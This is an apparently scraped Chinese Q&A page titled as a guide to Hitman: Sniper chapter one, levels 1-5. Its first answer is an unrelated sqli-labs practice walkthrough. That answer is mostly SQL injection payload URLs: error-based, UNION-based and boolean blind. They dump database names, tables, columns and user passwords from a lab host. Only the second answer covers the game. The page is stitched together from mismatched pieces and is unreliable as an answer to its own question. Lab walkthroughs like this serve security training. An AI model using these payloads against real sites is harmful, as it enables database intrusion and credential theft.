杀手:狙击第一章1-5关攻略

发布网友发布时间：2022-04-11 06:36

共2个回答

懂视网时间：2022-04-11 10:58

前言：

好久没手注了，被问了手注相关问题，忘的一干二净，抽出时间把手注再回忆一下，把sqli-labs简单过一下吧。

Less-1（GET单引号字符型注入）

#输入单引号后报错
http://192.168.1.115/sqli-labs/Less-1/?id=1%27

技术图片

#确定字段数
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 3%23
http://192.168.1.115/sqli-labs/Less-1/?id=1%27 order by 4%23

技术图片

#联合查询查看页面是否有显示位
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,2,3%23

技术图片

#查询数据库名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23

技术图片

#查询表名
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23

技术图片

#爆列
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘ %23

技术图片

#爆值
http://192.168.1.115/sqli-labs/Less-1/?id=1000%27union select 1,group_concat(username,password),3 from users %23

技术图片

Less-2（GET整型注入）

#查看页面变化
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=1
http://192.168.1.115/sqli-labs/Less-2/?id=1 and 1=2
#确定数字段
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 3%23
http://192.168.1.115/sqli-labs/Less-2/?id=1 order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,2,3
#爆库
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),3
#爆表
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")
#爆列
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘
#爆值
http://192.168.1.115/sqli-labs/Less-2/?id=0 union select 1,group_concat(username,password),3 from users

Less-3（GET单引号变形字符型注入）

#查看页面报错
http://192.168.1.115/sqli-labs/Less-2/?id=1‘
http://192.168.1.115/sqli-labs/Less-3/?id=1%27)%20%23
#确定数字段
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 3%23
http://192.168.1.115/sqli-labs/Less-3/?id=0%27) order by 4%23
#联合查询查看显示位
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union%20select%201,2,3%23
#爆库
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),3%23
#爆表
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,(select group_concat(schema_name)from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema="security")%23
#爆列
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(column_name),3 from information_schema.columns where table_name=‘users‘%23
#爆值
http://192.168.1.115/sqli-labs/Less-3/?id=0%27)%20union select 1,group_concat(username,password),3 from users%23

技术图片

Less-4（GET双引号字符型注入）

http://192.168.1.115/sqli-labs/Less-4/?id=1%22

http://192.168.1.115/sqli-labs/Less-4/?id=1%22)%20%23

查看报错信息，使用双引号、右括号闭合，其余按照联合查询流程即可

技术图片

Less-5（基于布尔的盲注）

#判断数据库版本，left(code, 1)表示取code字段从左截取1位
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=4 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(version(),1)=5 %23

#判断数据库长度，使用length()判断长度，二分法可提高效率
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length(database())=8 %23

#猜当前数据库名，left(code, 1)表示取code字段从左截取1位,截取至数据库长度即可判断出数据库名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>‘r‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)>‘t‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),1)=‘s‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>‘d‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)>‘f‘ %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27%20and%20left(database(),2)=‘e‘ %23
...

#判断表的个数，count()函数是用来统计表中记录的一个函数，返回匹配条件的行数。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(table_name) from information_schema.tables where table_schema=database())>0 %23

#判断表的长度，limit可以被用于强制select语句返回指定的记录数。
// SELECT * FROM table LIMIT 5,10; // 检索记录行 6-15
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>5 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))>10 %23
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 %23

#依次猜表名，substr(string,start,length);string为要截取的字符串；start为截取的起始位置；length为截取长度。
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80 %23
...类似

#确定列数
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and (select count(column_name) from information_schema.columns where table_schema=database() and table_name = ‘users‘)>0 %23

#确定列的长度
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and length((select column_name from information_schema.columns where table_schema=database() and table_name = ‘users‘ limit 0,1)) > 0 %23

#依次猜列名
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name = ‘users‘ limit 0,1),1,1))>79 %23

#确定数据
http://192.168.1.115/sqli-labs/Less-5/?id=1%27 and ascii(substr((select username from users limit 0,1),1,1))>79 %23

sqli-labs通关1-5教程

标签：ascii sele 表示 tab 条件联合匹配 column order by

热心网友时间：2022-04-11 08:06

《杀手:狙击》是一款站桩射击游戏。这款游戏是继《杀手47:行动》之后SQUARE
ENIX推出的新作。那么杀手:狙击Hitman:
Sniper第一章1-5关要怎么过呢？接下来，小编就给大家带来了杀手:狙击Hitman:
Sniper第一章1-5关通关攻略，帮助大家轻松过关！
>>>杀手:狙击攻略大全
杀手:狙击Hitman:
Sniper第一章第1关攻略
按要求杀死目标就行。
杀手:狙击Hitman:
Sniper第一章第2关攻略
一.达到75000分
二.爆头2人
三.杀死目标
已经爆头2个。
下面有个头像
是这一关的特殊目标
可杀可不杀。
特殊目标标识紫色
需要锁定一段时间才显示。
杀手:狙击Hitman:
Sniper第一章第3关攻略
一.杀死护卫4人
二.杀死目标
杀手:狙击Hitman:
Sniper第一章第4关攻略
一.把任何尸体藏进水池里
二.杀死目标
等这个货靠近水池开一*就可以完成任务一了。
杀手:狙击Hitman:
Sniper第一章第5关攻略
一.达到125000分
二.不要让NPC提高警惕（建议在另一个NPC面前杀掉一个NPC，再把目击者干掉）
三.杀死目标
以上就是由小编给大家带来的杀手:狙击Hitman:
Sniper第一章1-5关攻略的全部内容了，希望对你有所帮助。